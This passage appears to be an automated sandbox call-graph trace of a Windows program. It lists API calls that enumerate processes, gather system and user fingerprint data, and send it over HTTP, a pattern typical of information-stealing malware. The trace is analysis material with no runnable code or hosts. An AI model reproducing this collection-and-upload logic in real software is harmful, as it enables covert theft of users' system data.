21799->21800 21801 1847e8 3 API calls 21800->21801 21802 184612 21801->21802 21803 1847e8 3 API calls 21802->21803 21804 184629 21803->21804 21805 1847e8 3 API calls 21804->21805 21806 184642 21805->21806 21807 1847e8 3 API calls 21806->21807 21808 184656 21807->21808 21809 1847e8 3 API calls 21808->21809 21810 18466d 21809->21810 21811 1847e8 3 API calls 21810->21811 21812 184684 21811->21812 21813 1847e8 3 API calls 21812->21813 21814 18469b 21813->21814 21815 1847e8 3 API calls 21814->21815 21816 1846b2 21815->21816 21817 1847e8 3 API calls 21816->21817 21818 1846cc 21817->21818 21819 1847e8 3 API calls 21818->21819 21820 1846e3 21819->21820 21821 1847e8 3 API calls 21820->21821 21822 1846f9 21821->21822 21823 1847e8 3 API calls 21822->21823 21824 184710 21823->21824 21825 1847e8 3 API calls 
21824->21825 21826 184727 21825->21826 21827 1847e8 3 API calls 21826->21827 21828 18473d 21827->21828 21829 1847e8 3 API calls 21828->21829 21830 184754 21829->21830 21831 1847e8 3 API calls 21830->21831 21832 184768 21831->21832 21833 1847e8 3 API calls 21832->21833 21834 184781 21833->21834 21835 1847e8 3 API calls 21834->21835 21836 184797 21835->21836 21837 1847e8 3 API calls 21836->21837 21838 1847ae 21837->21838 21839 1847e8 3 API calls 21838->21839 21840 1847c5 21839->21840 21841 1847e8 3 API calls 21840->21841 21842 1847dc 21841->21842 21842->20850 23008 1af159 21843->23008 21845 192563 CreateToolhelp32Snapshot Process32First 21846 1925c4 CloseHandle 21845->21846 21847 192597 Process32Next 21845->21847 23009 1af1b5 21846->23009 21847->21846 21848 1925a9 StrCmpCA 21847->21848 21848->21847 21850 1925bb 21848->21850 21850->21847 21853 1904bc lstrcpyA 21852->21853 21854 191c3c 21853->21854 21855 1904bc lstrcpyA 21854->21855 21856 191c4a GetSystemTime 21855->21856 21857 191c66 21856->21857 21858 19d05a UnDecorator::getZName 5 API calls 21857->21858 21859 191c9d 21858->21859 21859->20856 21861 1905b6 21860->21861 21862 1905da 21861->21862 21863 1905c8 lstrcpyA lstrcatA 21861->21863 21862->20872 21863->21862 21865 1904ee lstrcpyA 21864->21865 21866 181d07 21865->21866 21867 1904ee lstrcpyA 21866->21867 21868 181d12 21867->21868 21869 1904ee lstrcpyA 21868->21869 21870 181d1d 21869->21870 21871 1904ee lstrcpyA 21870->21871 21872 181d34 21871->21872 21873 1969f8 21872->21873 21874 19051e 2 API calls 21873->21874 21875 196a2e 21874->21875 21876 19051e 2 API calls 21875->21876 21877 196a3b 21876->21877 21878 19051e 2 API calls 21877->21878 21879 196a48 21878->21879 21880 1904bc lstrcpyA 21879->21880 21881 196a55 21880->21881 21882 1904bc lstrcpyA 21881->21882 21883 196a62 21882->21883 21884 1904bc lstrcpyA 21883->21884 21885 196a6f 21884->21885 21886 1904bc lstrcpyA 21885->21886 21887 196a7c 21886->21887 21888 1904bc lstrcpyA 21887->21888 21889 196a89 21888->21889 
21890 1904bc lstrcpyA 21889->21890 21946 196a96 21890->21946 21893 181cfd lstrcpyA 21893->21946 21894 196ada StrCmpCA 21895 196b33 StrCmpCA 21894->21895 21894->21946 21897 196d16 21895->21897 21895->21946 21898 190562 lstrcpyA 21897->21898 21900 196d21 21898->21900 21902 1904bc lstrcpyA 21900->21902 21903 196d2e 21902->21903 21904 190562 lstrcpyA 21903->21904 21942 196c6e 21904->21942 21905 196880 28 API calls 21905->21946 21906 196908 33 API calls 21906->21946 21907 1904bc lstrcpyA 21908 196d4d 21907->21908 21910 190562 lstrcpyA 21908->21910 21909 196b93 StrCmpCA 21911 196bec StrCmpCA 21909->21911 21909->21946 21912 196d57 21910->21912 21913 196c02 StrCmpCA 21911->21913 21914 196ce5 21911->21914 23018 196de4 21912->23018 21917 196c18 StrCmpCA 21913->21917 21918 196cb4 21913->21918 21916 190562 lstrcpyA 21914->21916 21920 196cf0 21916->21920 21921 196c2a StrCmpCA 21917->21921 21922 196c80 21917->21922 21924 190562 lstrcpyA 21918->21924 21927 1904bc lstrcpyA 21920->21927 21928 196c4c 21921->21928 21929 196c3c Sleep 21921->21929 21926 190562 lstrcpyA 21922->21926 21923 1904ee lstrcpyA 21923->21946 21925 196cbf 21924->21925 21930 1904bc lstrcpyA 21925->21930 21931 196c8b 21926->21931 21932 196cfd 21927->21932 21933 190562 lstrcpyA 21928->21933 21929->21946 21934 196ccc 21930->21934 21935 1904bc lstrcpyA 21931->21935 21936 190562 lstrcpyA 21932->21936 21937 196c57 21933->21937 21938 190562 lstrcpyA 21934->21938 21939 196c98 21935->21939 21936->21942 21940 1904bc lstrcpyA 21937->21940 21938->21942 21943 190562 lstrcpyA 21939->21943 21941 196c64 21940->21941 21944 190562 lstrcpyA 21941->21944 21942->21907 21943->21942 21944->21942 21945 190562 lstrcpyA 21945->21946 21946->21893 21946->21894 21946->21895 21946->21905 21946->21906 21946->21909 21946->21911 21946->21923 21946->21945 23012 1829f8 21946->23012 23015 182a09 21946->23015 23025 182a1a lstrcpyA 21946->23025 23026 182a2b lstrcpyA 21946->23026 23027 182a3c lstrcpyA 21946->23027 23028 182a4d lstrcpyA 21946->23028 
21947 196d6a 21947->20884 21949 190562 lstrcpyA 21948->21949 21950 198299 21949->21950 21951 190562 lstrcpyA 21950->21951 21952 1982a4 21951->21952 21953 190562 lstrcpyA 21952->21953 21954 1982af 21953->21954 21954->20888 21956 1904fe 21955->21956 21957 190513 21956->21957 21958 19050b lstrcpyA 21956->21958 21957->20899 21958->21957 21960 1909bb GetVolumeInformationA 21959->21960 21961 1909b4 21959->21961 21962 190a22 21960->21962 21961->21960 21962->21962 21963 190a37 GetProcessHeap HeapAlloc 21962->21963 21964 190a61 wsprintfA lstrcatA 21963->21964 21965 190a52 21963->21965 23029 191659 GetCurrentHwProfileA 21964->23029 21966 1904bc lstrcpyA 21965->21966 21968 190a5a 21966->21968 21971 19d05a UnDecorator::getZName 5 API calls 21968->21971 21969 190a9c lstrlenA 23045 1923aa lstrcpyA malloc strncpy 21969->23045 21973 190b03 21971->21973 21972 190abf lstrcatA 21974 190ad6 21972->21974 21973->20926 21975 1904bc lstrcpyA 21974->21975 21976 190aed 21975->21976 21976->21968 21978 1904ee lstrcpyA 21977->21978 21979 184b59 21978->21979 23049 184ab6 21979->23049 21981 184b65 21982 1904bc lstrcpyA 21981->21982 21983 184b81 21982->21983 21984 1904bc lstrcpyA 21983->21984 21985 184b91 21984->21985 21986 1904bc lstrcpyA 21985->21986 21987 184ba1 21986->21987 21988 1904bc lstrcpyA 21987->21988 21989 184bb1 21988->21989 21990 1904bc lstrcpyA 21989->21990 21991 184bc1 InternetOpenA StrCmpCA 21990->21991 21992 184bf5 21991->21992 21993 185194 InternetCloseHandle 21992->21993 21994 184c07 21992->21994 22005 1851e1 21993->22005 21995 191c1f 7 API calls 21994->21995 21996 184c15 21995->21996 21997 19059c 2 API calls 21996->21997 21998 184c28 21997->21998 21999 190562 lstrcpyA 21998->21999 22000 184c33 21999->22000 22001 1905de 3 API calls 22000->22001 22002 184c5f 22001->22002 22003 190562 lstrcpyA 22002->22003 22004 184c6a 22003->22004 22006 1905de 3 API calls 22004->22006 22007 19d05a UnDecorator::getZName 5 API calls 22005->22007 22008 184c8b 22006->22008 22009 185235 22007->22009 
22010 190562 lstrcpyA 22008->22010 22111 193a02 StrCmpCA 22009->22111 22011 184c96 22010->22011 22012 19059c 2 API calls 22011->22012 22013 184cb8 22012->22013 22014 190562 lstrcpyA 22013->22014 22015 184cc3 22014->22015 22016 1905de 3 API calls 22015->22016 22017 184ce4 22016->22017 22018 190562 lstrcpyA 22017->22018 22019 184cef 22018->22019 22020 1905de 3 API calls 22019->22020 22021 184d10 22020->22021 22022 190562 lstrcpyA 22021->22022 22023 184d1b 22022->22023 22024 1905de 3 API calls 22023->22024 22025 184d3d 22024->22025 22026 19059c 2 API calls 22025->22026 22027 184d48 22026->22027 22028 190562 lstrcpyA 22027->22028 22029 184d53 22028->22029 22030 184d69 InternetConnectA 22029->22030 22030->21993 22031 184d97 HttpOpenRequestA 22030->22031 22032 185188 InternetCloseHandle 22031->22032 22033 184dd7 22031->22033 22032->21993 22034 184dfb 22033->22034 22035 184ddf InternetSetOptionA 22033->22035 22036 1905de 3 API calls 22034->22036 22035->22034 22037 184e11 22036->22037 22038 190562 lstrcpyA 22037->22038 22039 184e1c 22038->22039 22040 19059c 2 API calls 22039->22040 22041 184e3e 22040->22041 22042 190562 lstrcpyA 22041->22042 22043 184e49 22042->22043 22044 1905de 3 API calls 22043->22044 22045 184e6a 22044->22045 22046 190562 lstrcpyA 22045->22046 22047 184e75 22046->22047 22048 1905de 3 API calls 22047->22048 22049 184e97 22048->22049 22050 190562 lstrcpyA 22049->22050 22051 184ea2 22050->22051 22052 1905de 3 API calls 22051->22052 22053 184ec3 22052->22053 22054 190562 lstrcpyA 22053->22054 22055 184ece 22054->22055 22056 1905de 3 API calls 22055->22056 22057 184eef 22056->22057 22058 190562 lstrcpyA 22057->22058 22059 184efa 22058->22059 22060 19059c 2 API calls 22059->22060 22061 184f19 22060->22061 22062 190562 lstrcpyA 22061->22062 22063 184f24 22062->22063 22064 1905de 3 API calls 22063->22064 22065 184f45 22064->22065 22066 190562 lstrcpyA 22065->22066 22067 184f50 22066->22067 22068 1905de 3 API calls 22067->22068 22069 184f71 22068->22069 22070 
190562 lstrcpyA 22069->22070 22071 184f7c 22070->22071 22072 19059c 2 API calls 22071->22072 22073 184f9e 22072->22073 22074 190562 lstrcpyA 22073->22074 22075 184fa9 22074->22075 22076 1905de 3 API calls 22075->22076 22077 184fca 22076->22077 22078 190562 lstrcpyA 22077->22078 22079 184fd5 22078->22079 22080 1905de 3 API calls 22079->22080 22081 184ff7 22080->22081 22082 190562 lstrcpyA 22081->22082 22083 185002 22082->22083 22084 1905de 3 API calls 22083->22084 22085 185023 22084->22085 22086 190562 lstrcpyA 22085->22086 22087 18502e 22086->22087 22088 1905de 3 API calls 22087->22088 22089 18504f 22088->22089 22090 190562 lstrcpyA 22089->22090 22091 18505a 22090->22091 22092 19059c 2 API calls 22091->22092 22093 185079 22092->22093 22094 190562 lstrcpyA 22093->22094 22095 185084 22094->22095 22096 1904bc lstrcpyA 22095->22096 22097 18509f 22096->22097 22098 19059c 2 API calls 22097->22098 22099 1850b6 22098->22099 22100 19059c 2 API calls 22099->22100 22101 1850c7 22100->22101 22102 190562 lstrcpyA 22101->22102 22103 1850d2 22102->22103 22104 1850e8 lstrlenA lstrlenA HttpSendRequestA 22103->22104 22105 18515c InternetReadFile 22104->22105 22106 185176 InternetCloseHandle 22105->22106 22109 18511c 22105->22109 22107 182920 22106->22107 22107->22032 22108 1905de 3 API calls 22108->22109 22109->22105 22109->22106 22109->22108 22110 190562 lstrcpyA 22109->22110 22110->22109 22112 193a28 strtok_s 22111->22112 22113 193a21 ExitProcess 22111->22113 22114 193b88 22112->22114 22127 193a44 22112->22127 22114->20935 22115 193b6a strtok_s 22115->22114 22115->22127 22116 193a99 StrCmpCA 22116->22115 22116->22127 22117 193b09 StrCmpCA 22117->22115 22117->22127 22118 193a7d StrCmpCA 22118->22115 22118->22127 22119 193adf StrCmpCA 22119->22115 22119->22127 22120 193b1e StrCmpCA 22120->22115 22121 193a61 StrCmpCA 22121->22115 22121->22127 22122 193ab5 StrCmpCA 22122->22115 22122->22127 22123 193af4 StrCmpCA 22123->22115 22123->22127 22124 193b34 StrCmpCA 22124->22115 22125 193b56 
StrCmpCA 22125->22115 22126 19051e 2 API calls 22126->22127 22127->22115 22127->22116 22127->22117 22127->22118 22127->22119 22127->22120 22127->22121 22127->22122 22127->22123 22127->22124 22127->22125 22127->22126 22129 1904ee lstrcpyA 22128->22129 22130 185f64 22129->22130 22131 184ab6 5 API calls 22130->22131 22132 185f70 22131->22132 22133 1904bc lstrcpyA 22132->22133 22134 185f8c 22133->22134 22135 1904bc lstrcpyA 22134->22135 22136 185f9c 22135->22136 22137 1904bc lstrcpyA 22136->22137 22138 185fac 22137->22138 22139 1904bc lstrcpyA 22138->22139 22140 185fbc 22139->22140 22141 1904bc lstrcpyA 22140->22141 22142 185fcc InternetOpenA StrCmpCA 22141->22142 22143 186000 22142->22143 22144 1866ff InternetCloseHandle 22143->22144 22145 186012 22143->22145 23053 188048 CryptStringToBinaryA 22144->23053 22147 191c1f 7 API calls 22145->22147 22149 186020 22147->22149 22150 19059c 2 API calls 22149->22150 22152 186033 22150->22152 22151 19051e 2 API calls 22154 186739 22151->22154 22153 190562 lstrcpyA 22152->22153 22158 18603e 22153->22158 22155 1905de 3 API calls 22154->22155 22156 186750 22155->22156 22157 190562 lstrcpyA 22156->22157 22163 18675b 22157->22163 22159 1905de 3 API calls 22158->22159 22160 18606a 22159->22160 22161 190562 lstrcpyA 22160->22161 22162 186075 22161->22162 22166 1905de 3 API calls 22162->22166 22164 19d05a UnDecorator::getZName 5 API calls 22163->22164 22165 1867eb 22164->22165 22296 19347f strtok_s 22165->22296 22167 186096 22166->22167 22168 190562 lstrcpyA 22167->22168 22169 1860a1 22168->22169 22170 19059c 2 API calls 22169->22170 22171 1860c3 22170->22171 22172 190562 lstrcpyA 22171->22172 22173 1860ce 22172->22173 22174 1905de 3 API calls 22173->22174 22175 1860ef 22174->22175 22176 190562 lstrcpyA 22175->22176 22177 1860fa 22176->22177 22178 1905de 3 API calls 22177->22178 22179 18611b 22178->22179 22180 190562 lstrcpyA 22179->22180 22181 186126 22180->22181 22182 1905de 3 API calls 22181->22182 22183 186148 22182->22183 22184 
19059c 2 API calls 22183->22184 22185 186153 22184->22185 22186 190562 lstrcpyA 22185->22186 22187 18615e 22186->22187 22188 186174 InternetConnectA 22187->22188 22188->22144 22189 1861a2 HttpOpenRequestA 22188->22189 22190 1861e2 22189->22190 22191 1866f3 InternetCloseHandle 22189->22191 22192 1861ea InternetSetOptionA 22190->22192 22193 186206 22190->22193 22191->22144 22192->22193 22194 1905de 3 API calls 22193->22194 22195 18621c 22194->22195 22196 190562 lstrcpyA 22195->22196 22197 186227 22196->22197 22198 19059c 2 API calls 22197->22198 22199 186249 22198->22199 22200 190562 lstrcpyA 22199->22200 22201 186254 22200->22201 22202 1905de 3 API calls 22201->22202 22203 186275 22202->22203 22204 190562 lstrcpyA 22203->22204 22205 186280 22204->22205 22206 1905de 3 API calls 22205->22206 22207 1862a2 22206->22207 22208 190562 lstrcpyA 22207->22208 22209 1862ad 22208->22209 22210 1905de 3 API calls 22209->22210 22211 1862cf 22210->22211 22212 190562 lstrcpyA 22211->22212 22213 1862da 22212->22213 22214 1905de 3 API calls 22213->22214 22215 1862fb 22214->22215 22216 190562 lstrcpyA 22215->22216 22217 186306 22216->22217 22218 19059c 2 API calls 22217->22218 22219 186325 22218->22219 22220 190562 lstrcpyA 22219->22220 22221 186330 22220->22221 22222 1905de 3 API calls 22221->22222 22223 186351 22222->22223 22224 190562 lstrcpyA 22223->22224 22225 18635c 22224->22225 22226 1905de 3 API calls 22225->22226 22227 18637d 22226->22227 22228 190562 lstrcpyA 22227->22228 22229 186388 22228->22229 22230 19059c 2 API calls 22229->22230 22231 1863aa 22230->22231 22232 190562 lstrcpyA 22231->22232 22233 1863b5 22232->22233 22234 1905de 3 API calls 22233->22234 22235 1863d6 22234->22235 22236 190562 lstrcpyA 22235->22236 22237 1863e1 22236->22237 22238 1905de 3 API calls 22237->22238 22239 186403 22238->22239 22240 190562 lstrcpyA 22239->22240 22241 18640e 22240->22241 22242 1905de 3 API calls 22241->22242 22243 18642f 22242->22243 22244 190562 lstrcpyA 22243->22244 22245 18643a 
22244->22245 22246 1905de 3 API calls 22245->22246 22247 18645b 22246->22247 22248 190562 lstrcpyA 22247->22248 22249 186466 22248->22249 22250 1905de 3 API calls 22249->22250 22251 186487 22250->22251 22252 190562 lstrcpyA 22251->22252 22253 186492 22252->22253 22254 1905de 3 API calls 22253->22254 22255 1864b3 22254->22255 22256 190562 lstrcpyA 22255->22256 22257 1864be 22256->22257 22258 1905de 3 API calls 22257->22258 22259 1864df 22258->22259 22260 190562 lstrcpyA 22259->22260 22261 1864ea 22260->22261 22262 19059c 2 API calls 22261->22262 22263 186506 22262->22263 22264 190562 lstrcpyA 22263->22264 22265 186511 22264->22265 22266 1905de 3 API calls 22265->22266 22267 186532 22266->22267 22268 190562 lstrcpyA 22267->22268 22269 18653d 22268->22269 22270 1905de 3 API calls 22269->22270 22271 18655f 22270->22271 22272 190562 lstrcpyA 22271->22272 22273 18656a 22272->22273 22274 1905de 3 API calls 22273->22274 22275 18658b 22274->22275 22276 190562 lstrcpyA 22275->22276 22277 186596 22276->22277 22278 1905de 3 API calls 22277->22278 22279 1865b7 22278->22279 22280 190562 lstrcpyA 22279->22280 22281 1865c2 22280->22281 22282 19059c 2 API calls 22281->22282 22283 1865e1 22282->22283 22284 190562 lstrcpyA 22283->22284 22285 1865ec 22284->22285 22286 1865f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 22285->22286 23058 1a70a0 22286->23058 22288 18663e lstrlenA lstrlenA 23059 1a70a0 22288->23059 22290 186667 lstrlenA HttpSendRequestA 22291 1866d2 InternetReadFile 22290->22291 22292 1866ec InternetCloseHandle 22291->22292 22294 186692 22291->22294 22292->22191 22293 1905de 3 API calls 22293->22294 22294->22291 22294->22292 22294->22293 22295 190562 lstrcpyA 22294->22295 22295->22294 22297 19350c 22296->22297 22298 1934ae 22296->22298 22297->20949 22299 1934f6 strtok_s 22298->22299 22300 19051e 2 API calls 22298->22300 22301 19051e 2 API calls 22298->22301 22299->22297 22299->22298 22300->22299 22301->22298 22310 1932c6 22302->22310 22303 1933c5 22303->20963 
22304 193372 StrCmpCA 22304->22310 22305 19051e 2 API calls 22305->22310 22306 1933a7 strtok_s 22306->22310 22307 193341 StrCmpCA 22307->22310 22308 19331c StrCmpCA 22308->22310 22309 1932eb StrCmpCA 22309->22310 22310->22303 22310->22304 22310->22305 22310->22306 22310->22307 22310->22308 22310->22309 22314 1933fc 22311->22314 22317 193474 22311->22317 22312 193422 StrCmpCA 22312->22314 22313 19051e 2 API calls 22315 19345a strtok_s 22313->22315 22314->22312 22314->22313 22314->22315 22316 19051e 2 API calls 22314->22316 22315->22314 22315->22317 22316->22314 22317->20975 22319 1904bc lstrcpyA 22318->22319 22320 193bdf 22319->22320 22321 1905de 3 API calls 22320->22321 22322 193bef 22321->22322 22323 190562 lstrcpyA 22322->22323 22324 193bf7 22323->22324 22325 1905de 3 API calls 22324->22325 22326 193c0f 22325->22326 22327 190562 lstrcpyA 22326->22327 22328 193c17 22327->22328 22329 1905de 3 API calls 22328->22329 22330 193c2f 22329->22330 22331 190562 lstrcpyA 22330->22331 22332 193c37 22331->22332 22333 1905de 3 API calls 22332->22333 22334 193c4f 22333->22334 22335 190562 lstrcpyA 22334->22335 22336 193c57 22335->22336 22337 1905de 3 API calls 22336->22337 22338 193c6f 22337->22338 22339 190562 lstrcpyA 22338->22339 22340 193c77 22339->22340 23060 190c95 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 22340->23060 22343 1905de 3 API calls 22344 193c90 22343->22344 22345 190562 lstrcpyA 22344->22345 22346 193c98 22345->22346 22347 1905de 3 API calls 22346->22347 22348 193cb0 22347->22348 22349 190562 lstrcpyA 22348->22349 22350 193cb8 22349->22350 22351 1905de 3 API calls 22350->22351 22352 193cd0 22351->22352 22353 190562 lstrcpyA 22352->22353 22354 193cd8 22353->22354 23063 1915a9 22354->23063 22357 1905de 3 API calls 22358 193cf1 22357->22358 22359 190562 lstrcpyA 22358->22359 22360 193cf9 22359->22360 22361 1905de 3 API calls 22360->22361 22362 193d11 22361->22362 22363 190562 lstrcpyA 22362->22363 22364 193d19 22363->22364 22365 1905de 3 API calls 
22364->22365 22366 193d31 22365->22366 22367 190562 lstrcpyA 22366->22367 22368 193d39 22367->22368 22369 191659 11 API calls 22368->22369 22370 193d49 22369->22370 22371 19059c 2 API calls 22370->22371 22372 193d56 22371->22372 22373 190562 lstrcpyA 22372->22373 22374 193d5e 22373->22374 22375 1905de 3 API calls 22374->22375 22376 193d7e 22375->22376 22377 190562 lstrcpyA 22376->22377 22378 193d86 22377->22378 22379 1905de 3 API calls 22378->22379 22380 193d9e 22379->22380 22381 190562 lstrcpyA 22380->22381 22382 193da6 22381->22382 22383 190977 19 API calls 22382->22383 22384 193db6 22383->22384 22385 19059c 2 API calls 22384->22385 22386 193dc3 22385->22386 22387 190562 lstrcpyA 22386->22387 22388 193dcb 22387->22388 22389 1905de 3 API calls 22388->22389 22390 193deb 22389->22390 22391 190562 lstrcpyA 22390->22391 22392 193df3 22391->22392 22393 1905de 3 API calls 22392->22393 22394 193e0b 22393->22394 22395 190562 lstrcpyA 22394->22395 22396 193e13 22395->22396 22397 193e1b GetCurrentProcessId 22396->22397 23070 19221f OpenProcess 22397->23070 22400 19059c 2 API calls 22401 193e38 22400->22401 22402 190562 lstrcpyA 22401->22402 22403 193e40 22402->22403 22404 1905de 3 API calls 22403->22404 22405 193e60 22404->22405 22406 190562 lstrcpyA 22405->22406 22407 193e68 22406->22407 22408 1905de 3 API calls 22407->22408 22409 193e80 22408->22409 22410 190562 lstrcpyA 22409->22410 22411 193e88 22410->22411 22412 1905de 3 API calls 22411->22412 22413 193ea0 22412->22413 22414 190562 lstrcpyA 22413->22414 22415 193ea8 22414->22415 22416 1905de 3 API calls 22415->22416 22417 193ec0 22416->22417 22418 190562 lstrcpyA 22417->22418 22419 193ec8 22418->22419 23077 190b05 GetProcessHeap HeapAlloc 22419->23077 22422 1905de 3 API calls 22423 193ee1 22422->22423 22424 190562 lstrcpyA 22423->22424 22425 193ee9 22424->22425 22426 1905de 3 API calls 22425->22426 22427 193f01 22426->22427 22428 190562 lstrcpyA 22427->22428 22429 193f09 22428->22429 22430 1905de 3 API calls 
22429->22430 22431 193f21 22430->22431 22432 190562 lstrcpyA 22431->22432 22433 193f29 22432->22433 23084 1917dc 22433->23084 22436 19059c 2 API calls 22437 193f46 22436->22437 22438 190562 lstrcpyA 22437->22438 22439 193f4e 22438->22439 22440 1905de 3 API calls 22439->22440 22441 193f6e 22440->22441 22442 190562 lstrcpyA 22441->22442 22443 193f76 22442->22443 22444 1905de 3 API calls 22443->22444 22445 193f8e 22444->22445 22446 190562 lstrcpyA 22445->22446 22447 193f96 22446->22447 23101 19196c 22447->23101 22449 193fa7 22450 19059c 2 API calls 22449->22450 22451 193fb5 22450->22451 22452 190562 lstrcpyA 22451->22452 22453 193fbd 22452->22453 22454 1905de 3 API calls 22453->22454 22455 193fdd 22454->22455 22456 190562 lstrcpyA 22455->22456 22457 193fe5 22456->22457 22458 1905de 3 API calls 22457->22458 22459 193ffd 22458->22459 22460 190562 lstrcpyA 22459->22460 22461 194005 22460->22461 22462 190c5a 3 API calls 22461->22462 22463 194012 22462->22463 22464 1905de 3 API calls 22463->22464 22465 19401e 22464->22465 22466 190562 lstrcpyA 22465->22466 22467 194026 22466->22467 22468 1905de 3 API calls 22467->22468 22469 19403e 22468->22469 22470 190562 lstrcpyA 22469->22470 22471 194046 22470->22471 22472 1905de 3 API calls 22471->22472 22473 19405e 22472->22473 22474 190562 lstrcpyA 22473->22474 22475 194066 22474->22475 23116 190c28 GetProcessHeap HeapAlloc GetUserNameA 22475->23116 22477 194073 22478 1905de 3 API calls 22477->22478 22479 19407f 22478->22479 22480 190562 lstrcpyA 22479->22480 22481 194087 22480->22481 22482 1905de 3 API calls 22481->22482 22483 19409f 22482->22483 22484 190562 lstrcpyA 22483->22484 22485 1940a7 22484->22485 22486 1905de 3 API calls 22485->22486 22487 1940bf 22486->22487 22488 190562 lstrcpyA 22487->22488 22489 1940c7 22488->22489 23117 191538 7 API calls 22489->23117 22492 19059c 2 API calls 22493 1940e6 22492->22493 22494 190562 lstrcpyA 22493->22494 22495 1940ee 22494->22495 22496 1905de 3 API calls 22495->22496 22497 19410e 
22496->22497 22498 190562 lstrcpyA 22497->22498 22499 194116 22498->22499 22500 1905de 3 API calls 22499->22500 22501 19412e 22500->22501 22502 190562 lstrcpyA 22501->22502 22503 194136 22502->22503 23120 190db0 22503->23120 22506 19059c 2 API calls 22507 194153 22506->22507 22508 190562 lstrcpyA 22507->22508 22509 19415b 22508->22509 22510 1905de 3 API calls 22509->22510 22511 19417b 22510->22511 22512 190562 lstrcpyA 22511->22512 22513 194183 22512->22513 22514 1905de 3 API calls 22513->22514 22515 19419b 22514->22515 22516 190562 lstrcpyA 22515->22516 22517 1941a3 22516->22517 22518 190c95 9 API calls 22517->22518 22519 1941b0 22518->22519 22520 1905de 3 API calls 22519->22520 22521 1941bc 22520->22521 22522 190562 lstrcpyA 22521->22522 22523 1941c4 22522->22523 22524 1905de 3 API calls 22523->22524 22525 1941dc 22524->22525 22526 190562 lstrcpyA 22525->22526 22527 1941e4 22526->22527 22528 1905de 3 API calls 22527->22528 22529 1941fc 22528->22529 22530 190562 lstrcpyA 22529->22530 22531 194204 22530->22531 23132 190d03 GetProcessHeap HeapAlloc GetTimeZoneInformation 22531->23132 22534 1905de 3 API calls 22535 19421d 22534->22535 22536 190562 lstrcpyA 22535->22536 22537 194225 22536->22537 22538 1905de 3 API calls 22537->22538 22539 19423d 22538->22539 22540 190562 lstrcpyA 22539->22540 22541 194245 22540->22541 22542 1905de 3 API calls 22541->22542 22543 19425d 22542->22543 22544 190562 lstrcpyA 22543->22544 22545 194265 22544->22545 22546 1905de 3 API calls 22545->22546 22547 19427d 22546->22547 22548 190562 lstrcpyA 22547->22548 22549 194285 22548->22549 23137 190f26 GetProcessHeap HeapAlloc RegOpenKeyExA 22549->23137 22551 194292 22552 1905de 3 API calls 22551->22552 22553 19429e 22552->22553 22554 190562 lstrcpyA 22553->22554 22555 1942a6 22554->22555 22556 1905de 3 API calls 22555->22556 22557 1942be 22556->22557 22558 190562 lstrcpyA 22557->22558 22559 1942c6 22558->22559 22560 1905de 3 API calls 22559->22560 22561 1942de 22560->22561 22562 190562 
lstrcpyA 22561->22562 22563 1942e6 22562->22563 23140 190fdc 22563->23140 22566 1905de 3 API calls 22567 1942ff 22566->22567 22568 190562 lstrcpyA 22567->22568 22569 194307 22568->22569 22570 1905de 3 API calls 22569->22570 22571 19431f 22570->22571 22572 190562 lstrcpyA 22571->22572 22573 194327 22572->22573 22574 1905de 3 API calls 22573->22574 22575 19433f 22574->22575 22576 190562 lstrcpyA 22575->22576 22577 194347 22576->22577 23157 190f8f GetSystemInfo wsprintfA 22577->23157 22580 1905de 3 API calls 22581 194360 22580->22581 22582 190562 lstrcpyA 22581->22582 22583 194368 22582->22583 22584 1905de 3 API calls 22583->22584 22585 194380 22584->22585 22586 190562 lstrcpyA 22585->22586 22587 194388 22586->22587 22588 1905de 3 API calls 22587->22588 22589 1943a0 22588->22589 22590 190562 lstrcpyA 22589->22590 22591 1943a8 22590->22591 23160 1910ee GetProcessHeap HeapAlloc 22591->23160 22594 1905de 3 API calls 22595 1943c1 22594->22595 22596 190562 lstrcpyA 22595->22596 22597 1943c9 22596->22597 22598 1905de 3 API calls 22597->22598 22599 1943e4 22598->22599 22600 190562 lstrcpyA 22599->22600 22601 1943ec 22600->22601 22602 1905de 3 API calls 22601->22602 22603 194407 22602->22603 22604 190562 lstrcpyA 22603->22604 22605 19440f 22604->22605 23167 191167 22605->23167 22608 19059c 2 API calls 22609 19442f 22608->22609 22610 190562 lstrcpyA 22609->22610 22611 194437 22610->22611 22612 1905de 3 API calls 22611->22612 22613 19445a 22612->22613 22614 190562 lstrcpyA 22613->22614 22615 194462 22614->22615 22616 1905de 3 API calls 22615->22616 22617 19447a 22616->22617 22618 190562 lstrcpyA 22617->22618 22619 194482 22618->22619 23174 19147a 22619->23174 22622 19059c 2 API calls 22623 1944a2 22622->22623 22624 190562 lstrcpyA 22623->22624 22625 1944aa 22624->22625 22626 1905de 3 API calls 22625->22626 22627 1944d0 22626->22627 22628 190562 lstrcpyA 22627->22628 22629 1944d8 22628->22629 22630 1905de 3 API calls 22629->22630 22631 1944f3 22630->22631 22632 190562 lstrcpyA 
22631->22632 22633 1944fb 22632->22633 23184 1911d8 22633->23184 22636 19059c 2 API calls 22637 194520 22636->22637 22638 190562 lstrcpyA 22637->22638 22639 194528 22638->22639 22640 1911d8 21 API calls 22639->22640 22641 194549 22640->22641 22642 19059c 2 API calls 22641->22642 22643 194558 22642->22643 22644 190562 lstrcpyA 22643->22644 22645 194560 22644->22645 22646 1905de 3 API calls 22645->22646 22647 194583 22646->22647 22648 190562 lstrcpyA 22647->22648 22649 19458b 22648->22649 22650 181cfd lstrcpyA 22649->22650 22651 1945a0 lstrlenA 22650->22651 22652 1904bc lstrcpyA 22651->22652 22653 1945bd 22652->22653 23204 196ed9 22653->23204 22655 1945c6 22655->20983 22657 1904ee lstrcpyA 22656->22657 22658 18525a 22657->22658 22659 184ab6 5 API calls 22658->22659 22660 185266 GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 22659->22660 22661 1852cb 22660->22661 22662 1852d9 InternetConnectA 22661->22662 22663 18544b InternetCloseHandle 22661->22663 22664 18543f InternetCloseHandle 22662->22664 22665 185305 HttpOpenRequestA 22662->22665 22666 18545f 22663->22666 22664->22663 22667 185433 InternetCloseHandle 22665->22667 22668 185346 22665->22668 22672 19d05a UnDecorator::getZName 5 API calls 22666->22672 22667->22664 22669 18534a InternetSetOptionA 22668->22669 22670 185366 HttpSendRequestA HttpQueryInfoA 22668->22670 22669->22670 22671 1853bb 22670->22671 22675 18539e 22670->22675 22671->22667 22673 1853c1 InternetReadFile 22671->22673 22674 185480 22672->22674 22673->22667 22673->22671 22674->20994 22675->22666 23448 187eee 22676->23448 22678 18ec73 22680 181cfd lstrcpyA 22678->22680 22679 18eac4 StrCmpCA 22681 18eb21 StrCmpCA 22679->22681 22694 